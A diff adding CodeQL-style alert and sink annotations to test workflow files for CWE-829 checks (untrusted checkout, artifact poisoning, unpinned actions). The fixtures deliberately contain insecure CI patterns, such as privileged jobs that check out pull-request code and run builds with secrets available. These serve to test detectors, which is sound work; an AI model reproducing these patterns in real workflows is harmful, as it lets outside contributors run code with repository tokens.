af9f01b572f..184661fda49 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact + - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index e35bc73c3bd..806b9920467 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 + - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps - - run: make snapshot + - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index f970a3fa197..6498802afc9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install \ No newline at end of file + - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 28ffab637f0..7093027c4d9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} + - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 + - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: + test: # $ Sink[actions/untrusted-checkout/critical] permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} + - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage + - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov - uses: codecov/codecov-action@v3 + - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] + uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] - name: Stage new files and commit id: stage_files @@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 + uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 + uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index 072eae4b1d2..a905b6b9d66 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc + - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 1bda517c9a1..308cc9fde51 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 + - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] with: distribution: temurin java-version: 17 @@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request + - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index 3b8a6d6dd62..b338fbc5f16 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/critical] npm install npm run lint - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index ab121239c6e..f34f96996c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 @@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build + npm build # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 221854ec204..984c56d9028 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 + uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main + uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index ece4c02c356..133d033a4e9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: + test3: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 8c0865f598c..6dd5205c08e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} + ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index ac013eb6e2f..b25d53c739e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 + - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: + test2: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: + test3: # $ Alert[actions/untrusted-checkout/high] if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: + test4: # $ Alert[actions/untrusted-checkout/high] if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: + test5: # $ Alert[actions/untrusted-checkout/high] runs-on: ubuntu-20.04 steps: - id: request @@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 8485ad0ed67..0831bc9217c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard + - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch + - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] uses: actions/checkout@v2.x. - - name: Run latest action - uses: some-action/some-repo@latest + - name: Run latest action # $ Alert[actions/unversioned-immutable-action] + uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 56bb143cf36..32cef70963a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index 6014d08ed80..fef28af7925 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 + - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] - run: | npm install npm build - - uses: completely/fakeaction@v2 + - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 + - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 49908b7b4c5..47aa7725a81 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 + - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: + toppings: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index b539c562084..dbeeb1e0eeb 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" + - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] if: success() - uses: "ruby/setup-ruby@v1" + uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 6900c3bc23f..4035b3fb464 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml @@ -33,9 +33,9 @@ jobs: # For PRs make sure to checkout the PR branch ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Setup Pages + - name: Setup Pages # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 - - name: Build with Jekyll + - name: Build with Jekyll # $ Alert[actions/unversioned-immutable-action] uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 with: source: ./ @@ -44,7 +44,7 @@ jobs: # Automatically uploads an artifact from the './_site' directory by default uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 # Deployment job - deploy: + deploy: # $ Alert[actions/unversioned-immutable-action] environment: name: 'Pages Preview' url: ${{ steps.deployment.outputs.page_url }} @@ -60,4 +60,4 @@ jobs: id: deployment uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 with: - preview: 'true' + preview: 'true' # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml index 5501beb9ea2..9ecc8c2367b 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml @@ -39,12 +39,12 @@ jobs: with: ref: ${{ steps.branch-deploy.outputs.ref }} - - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 # $ Alert[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} with: bundler-cache: true - - name: bootstrap + - name: bootstrap # $ Sink[actions/untrusted-checkout/critical] if: ${{ steps.branch-deploy.outputs.continue == 'true' }} run: script/bootstrap @@ -55,4 +55,4 @@ jobs: set -o pipefail script/deploy | tee deploy.out bundle exec ruby script/ci/render_deploy_message.rb - rm deploy.out + rm deploy.out # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml index 4d5ae1f528c..39fc63beb3f 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml index 061ff7d02c5..a89f4ef3031 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/pr-workflow.yml @@ -57,7 +57,7 @@ jobs: - name: checkout uses: actions/checkout@v3 if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} - - uses: amannn/action-semantic-pull-request@v5 + - uses: amannn/action-semantic-pull-request@v5 # $ Alert[actions/unpinned-tag] if: ${{ inputs.github_event_name != 'merge_group' && inputs.github_event_name != 'push' }} with: requireScope: false @@ -106,7 +106,7 @@ jobs: persist-credentials: false submodules: false lfs: true - - uses: actionsdesk/lfs-warning@v3.2 + - uses: actionsdesk/lfs-warning@v3.2 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] name: lfs-warning with: labelName: lfs-detected! @@ -141,11 +141,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable @@ -219,12 +219,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-outputs - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" build-all-checks-packages: @@ -253,12 +253,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-checks - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" @@ -287,12 +287,12 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: build-all-deps-packages + - name: build-all-deps-packages # $ Alert[actions/untrusted-checkout/critical] if: ${{ inputs.flow == 'push' || inputs.flow == 'pr_from_branch' || inputs.flow == 'pr_from_fork' }} uses: "./.github/templates/watch-exec" with: command: nix -- build .#all-deps - - id: ok + - id: ok # $ Sink[actions/untrusted-checkout/critical] run: echo "ok=true" >> "$GITHUB_OUTPUT" draft-release-check: @@ -344,7 +344,7 @@ jobs: with: fetch-depth: 0 - name: Login to DockerHub - uses: docker/login-action@v2 + uses: docker/login-action@v2 # $ Alert[actions/unpinned-tag] with: username: ${{ secrets.DOCKER_HUB_USERNAME }} password: ${{ secrets.DOCKER_HUB_ACCESS_TOKEN }} @@ -353,7 +353,7 @@ jobs: nix run .#generate-release-artifacts --print-build-logs - name: Release artifacts - uses: softprops/action-gh-release@v1 + uses: softprops/action-gh-release@v1 # $ Alert[actions/unpinned-tag] with: draft: true prerelease: false @@ -388,11 +388,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - name: Build all packages + - name: Build all packages # $ Alert[actions/untrusted-checkout/critical] uses: "./.github/templates/watch-exec" with: command: nix -- build .#all - - name: Publish cmc-api to docker hub + - name: Publish cmc-api to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-cmc-api.tar.gz @@ -401,7 +401,7 @@ jobs: name: cmc-api artifact: cmc-api:latest - - name: Publish devnet-xc to docker hub + - name: Publish devnet-xc to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/docker-image-devnet-xc.tar.gz @@ -411,7 +411,7 @@ jobs: artifact: devnet-xc:latest tag: ${{ inputs.github_event_name == 'push' && 'main' || ''}} - - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub + - name: Publish hyperspace-composable-rococo-picasso-rococo to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-rococo-picasso-rococo.tar.gz @@ -420,7 +420,7 @@ jobs: name: hyperspace-composable-rococo-picasso-rococo artifact: hyperspace-composable-rococo-picasso-rococo:latest - - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub + - name: Publish hyperspace-composable-polkadot-picasso-kusama to docker hub # $ Sink[actions/untrusted-checkout/critical] uses: "./.github/templates/docker-publish" with: image_path: result/hyperspace-composable-polkadot-picasso-kusama.tar.gz @@ -429,7 +429,7 @@ jobs: name: hyperspace-composable-polkadot-picasso-kusama artifact: hyperspace-composable-polkadot-picasso-kusama:latest - mantis-e2e: + mantis-e2e: # $ Sink[actions/untrusted-checkout/critical] name: mantis-e2e outputs: ok: ${{ steps.ok.outputs.ok }} @@ -446,11 +446,11 @@ jobs: lfs: true ref: ${{ inputs.github_event_pull_request_head_sha || github.sha }} persist-credentials: false - - uses: cachix/install-nix-action@v20 + - uses: cachix/install-nix-action@v20 # $ Alert[actions/unpinned-tag] Alert[actions/untrusted-checkout/high] with: nix_path: nixpkgs=channel:nixos-unstable - - uses: DeterminateSystems/magic-nix-cache-action@main - - uses: cachix/cachix-action@master + - uses: DeterminateSystems/magic-nix-cache-action@main # $ Alert[actions/unpinned-tag] + - uses: cachix/cachix-action@master # $ Alert[actions/unpinned-tag] with: authToken: "${{ secrets.CACHIX_AUTH_TOKEN }}" name: composable diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml index d8381176fd2..54f740735e2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -17,7 +17,7 @@ jobs: ref: ${{ github.head_ref }} token: ${{ secrets.DOCUBOT_REPO_PAT }} - - run: | + - run: | # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] ./cmd env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml index 72db8c29370..407659f09db 100644 --- 